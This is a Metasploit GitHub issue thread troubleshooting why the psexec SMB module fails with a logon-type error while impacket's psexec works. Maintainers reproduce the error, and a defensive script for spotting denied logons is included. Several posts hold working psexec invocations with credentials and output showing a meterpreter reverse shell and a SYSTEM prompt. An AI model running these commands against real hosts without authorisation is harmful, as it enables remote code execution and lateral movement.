metasploit-framework
exploit/windows/smb/psexec does not work while impacket-psexec does
Why does exploit/windows/smb/psexec react differently from impacket-psexec? Shouldn't they do the same thing?
impacket-psexec "loca:Pass"@172....
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 172.....
[*] Found writable share ADMIN$
[*] Uploading file fPZKRTEM.exe
[*] Opening SVCManager on 172.....
[*] Creating service tQTR on 172.....
[*] Starting service tQTR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.16299.192]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
use exploit/windows/smb/psexec
set rhosts 172...
set lhost tap0
set smbuser loca
set smbpass Pass
run
[*] Started reverse TCP handler on 17...:4444
[*] 172....:445 - Connecting to the server...
[*] 172....:445 - Authenticating to 172...:445 as user 'loca'...
[-] 172....:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
This includes:
- All of the item points within this template
- The result of the debug command in your Metasploit console
- Screenshots showing the issues you're having
- Exact replication steps
The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.
cc @cdelafuente-r7 - I'm not sure if there's enough detail to replicate the original issue, but does anything pop out to you as being different maybe? 🤔
I just tested against Windows 10 version 20H2 and could not reproduce the issue:
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS <redacted_ip> yes The target host(s), range CIDR identifier, or hosts file with sy
ntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) o
r a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass <redacted> no The password for the specified username
SMBUser smbtest no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <redacted_ip> yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set verbose true
verbose => true
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on <redacted_ip>:4444
[*] <redacted_ip>:445 - Connecting to the server...
[*] <redacted_ip>:445 - Authenticating to <redacted_ip>:445 as user 'smbtest'...
[!] <redacted_ip>:445 - No active DB -- Credential data will not be saved!
[*] <redacted_ip>:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] <redacted_ip>:445 - PowerShell found
[*] <redacted_ip>:445 - Selecting PowerShell target
[*] <redacted_ip>:445 - Powershell command length: 2463
[*] <redacted_ip>:445 - Executing the payload...
[*] <redacted_ip>:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Obtaining a service manager handle...
[*] <redacted_ip>:445 - Creating the service...
[+] <redacted_ip>:445 - Successfully created the service
[*] <redacted_ip>:445 - Starting the service...
[+] <redacted_ip>:445 - Service start timed out, OK if running a command or non-service executable...
[*] <redacted_ip>:445 - Removing the service...
[+] <redacted_ip>:445 - Successfully removed the service
[*] <redacted_ip>:445 - Closing service handle...
[*] Sending stage (175174 bytes) to <redacted_ip>
[*] Meterpreter session 1 opened (<redacted_ip>:4444 -> <redacted_ip>:50158) at 2021-06-08 18:36:12 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-UUQE0B4
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
@friedrico, that would be great if we could have more details to help us reproduce the issue. Also, a PCAP would be useful. Since SMBv3 with encryption is used by default, please disable encryption with this option to get meaningful packet capture:
set SMB::AlwaysEncrypt false
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Sorry, haven't had time.
I just repeated the actions - still the same problem. Even if I used set SMB::AlwaysEncrypt false
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/ui/console]
ActiveModule=exploit/windows/smb/psexec
[windows/smb/psexec]
WfsDelay=10
EXITFUNC=thread
WORKSPACE=
VERBOSE=true
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=172...
RPORT=445
SSL=false
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
DCERPC::max_frag_size=4096
DCERPC::fake_bind_multi=true
DCERPC::fake_bind_multi_prepend=0
DCERPC::fake_bind_multi_append=0
DCERPC::smb_pipeio=rw
DCERPC::ReadTimeout=10
NTLM::UseNTLMv2=true
NTLM::UseNTLM2_session=true
NTLM::SendLM=true
NTLM::UseLMKey=false
NTLM::SendNTLM=true
NTLM::SendSPN=true
SMB::pipe_evasion=false
SMB::pipe_write_min_size=1
SMB::pipe_write_max_size=1024
SMB::pipe_read_min_size=1
SMB::pipe_read_max_size=1024
SMB::pad_data_level=0
SMB::pad_file_level=0
SMB::obscure_trans_pipe_level=0
SMBDirect=true
SMBUser=loca
SMBPass=pass
SMBDomain=.
SMBName=*SMBSERVER
SMB::VerifySignature=false
SMB::ChunkSize=500
SMB::Native_OS=Windows 2000 2195
SMB::Native_LM=Windows 2000 5.0
SMB::ProtocolVersion=1,2,3
SMB::AlwaysEncrypt=false
SERVICE_NAME=
SERVICE_DISPLAY_NAME=
SERVICE_DESCRIPTION=
SERVICE_PERSIST=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=true
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SMBSHARE=
ALLOW_GUEST=false
SERVICE_FILENAME=
PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe
SERVICE_STUB_ENCODER=
CMD::DELAY=3
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=tap0
History
The following commands were ran during the session and before this issue occurred:
2000 use exploit/windows/smb/psexec
2001 set smbuser loca
2002 set smbpass pass
2003 set rhosts 172...
2004 set lhost tap0
2005 set verbose true
2006 set SMB::AlwaysEncrypt false
2007 run
2008 debug
Framework Errors
The following framework errors occurred before the issue occurred:
...
[09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
Web Service Errors
The following web service errors occurred before the issue occurred:
msf-ws.log does not exist.
Framework Logs
The following framework logs were recorded before the issue occurred:
...
[09/28/2021 04:19:30] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:19:36] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:20:05] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:20:10] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:20:53] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:20:58] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:22:05] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[09/28/2021 04:22:06] [d(0)] core: Negotiated SMB version: SMB3
[09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
Web Service Logs
The following web service logs were recorded before the issue occurred:
msf-ws.log does not exist.
Version/Install
The versions and install method of your Metasploit setup:
Framework: 6.1.7-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
base64(pcap):
sanitized
base64 -d <<< BASE64STR > my.pcap
Can I unclose the issue?
@friedrico Thanks for the update :+1: Just as an additional datapoint - what was the target OS, i.e. output of systeminfo?
meterpreter > sysinfo
Computer : WIN7
OS : Windows 10 (10.0 Build 16299).
Architecture : x64
System Language : en_US
Domain : ...
Logged On Users : 6
Meterpreter : x86/windows
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, I think the inactivity bot closed this one erroneously. Can we re-open?
This is still affecting recent systems -- here's a Windows 10 target example with the output of systeminfo:
meterpreter > execute -if "systeminfo"
Process 6836 created.
Channel 4 created.
Host Name: irrelevant
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.19044 N/A Build 19044
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-10181-97955-AA169
Original Install Date: 5/3/2022, 11:35:25 PM
System Boot Time: 11/11/2022, 6:44:39 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
[02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,468 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,350 MB
Virtual Memory: In Use: 1,449 MB
Metasploit version:
msfconsole -qx 'version'
Framework: 6.0.27-dev-
Console : 6.0.27-dev-
Tagging @adfoster-r7 (like a jerk) since I'm not sure how notifications work on closed issues.
@jeffmcjunkin Thanks for the ping; I grabbed friedrico's pcap and it seems like it might be an issue when using psexec with a local admin. Google's hinting that it might be a difference between using psexec and psexec -i for interactive logons versus network logon - but I haven't found the right gpo/priv incantations to replicate the error
If there's more details for how to create an env to reproduce this error that would be appreciated 💯
Edit: I added a user to the Deny access to this computer from the network gpo and got the STATUS_LOGON_TYPE_NOT_GRANTED error:
msf6 exploit(windows/smb/psexec) > run smb://admin_without_remote:[email protected]
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|testing as user 'admin_without_remote'...
[-] 192.168.123.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
but impacket didn't work either, so I'm probably close to the right area - but still haven't fully replicated yet 🤔
python3 ~/Documents/code/impacket/examples/psexec.py 'admin_without_remote:[email protected]'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_TYPE_NOT_GRANTED(A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.)
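On the target, a refusal like the one reproduced above is logged as a failed logon. The following is an added example, not part of the thread or of Metasploit: it scans Security event 4625 records for network logons (type 3) rejected with status 0xC000015B. The event XML is a constructed sample and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Namespace used by Windows event XML (as exported by Event Viewer / wevtutil).
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

STATUS_LOGON_TYPE_NOT_GRANTED = 0xC000015B  # the status code seen in the thread
LOGON_TYPE_NETWORK = 3                      # SMB sessions are network logons

# Constructed sample: two denied network logons, one bad-password failure,
# one denied RemoteInteractive logon and one successful logon (4624).
SAMPLE_EVENTS = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4625</EventID></System>
 <EventData>
  <Data Name="TargetUserName">admin_without_remote</Data>
  <Data Name="Status">0xc000015b</Data>
  <Data Name="LogonType">3</Data>
  <Data Name="IpAddress">192.0.2.10</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4625</EventID></System>
 <EventData>
  <Data Name="TargetUserName">Admin_Without_Remote</Data>
  <Data Name="Status">0xC000015B</Data>
  <Data Name="LogonType">3</Data>
  <Data Name="IpAddress">192.0.2.10</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4625</EventID></System>
 <EventData>
  <Data Name="TargetUserName">smbtest</Data>
  <Data Name="Status">0xC000006D</Data>
  <Data Name="LogonType">3</Data>
  <Data Name="IpAddress">192.0.2.10</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4625</EventID></System>
 <EventData>
  <Data Name="TargetUserName">admin_without_remote</Data>
  <Data Name="Status">0xC000015B</Data>
  <Data Name="LogonType">10</Data>
  <Data Name="IpAddress">192.0.2.11</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4624</EventID></System>
 <EventData>
  <Data Name="TargetUserName">smbtest</Data>
  <Data Name="LogonType">3</Data>
  <Data Name="IpAddress">192.0.2.10</Data>
 </EventData>
</Event>
</Events>"""


def _event_data(event):
    """Return the EventData name/value pairs of one event as a dict."""
    return {d.get("Name"): (d.text or "")
            for d in event.iterfind("e:EventData/e:Data", NS)}


def denied_network_logons(xml_text):
    """Count 4625 events per (user, source IP) where a network logon was
    refused because the account lacks that logon right."""
    hits = Counter()
    for event in ET.fromstring(xml_text).iterfind("e:Event", NS):
        if event.findtext("e:System/e:EventID", namespaces=NS) != "4625":
            continue
        data = _event_data(event)
        try:
            status = int(data.get("Status", "0"), 16)
            logon_type = int(data.get("LogonType", "0"))
        except ValueError:
            continue  # malformed record, skip rather than abort the scan
        if status == STATUS_LOGON_TYPE_NOT_GRANTED and logon_type == LOGON_TYPE_NETWORK:
            user = data.get("TargetUserName", "").lower()
            hits[(user, data.get("IpAddress", "-"))] += 1
    return hits


if __name__ == "__main__":
    for (user, ip), count in denied_network_logons(SAMPLE_EVENTS).items():
        print(f"{count} denied network logon(s) for {user} from {ip}")
```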
Tagging @joswr1ght who has encountered this issue as well, and I think can replicate it at will.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, this issue isn't Stale. @joswr1ght, can you still replicate this?
The steps for enabling the flags/policies to get an account to trigger this error locally where Metasploit fails and other tools succeed would definitely be appreciated 💯
I'm still thinking it's something to do with network logins versus interactive logins, but I haven't looked at this since poking at it last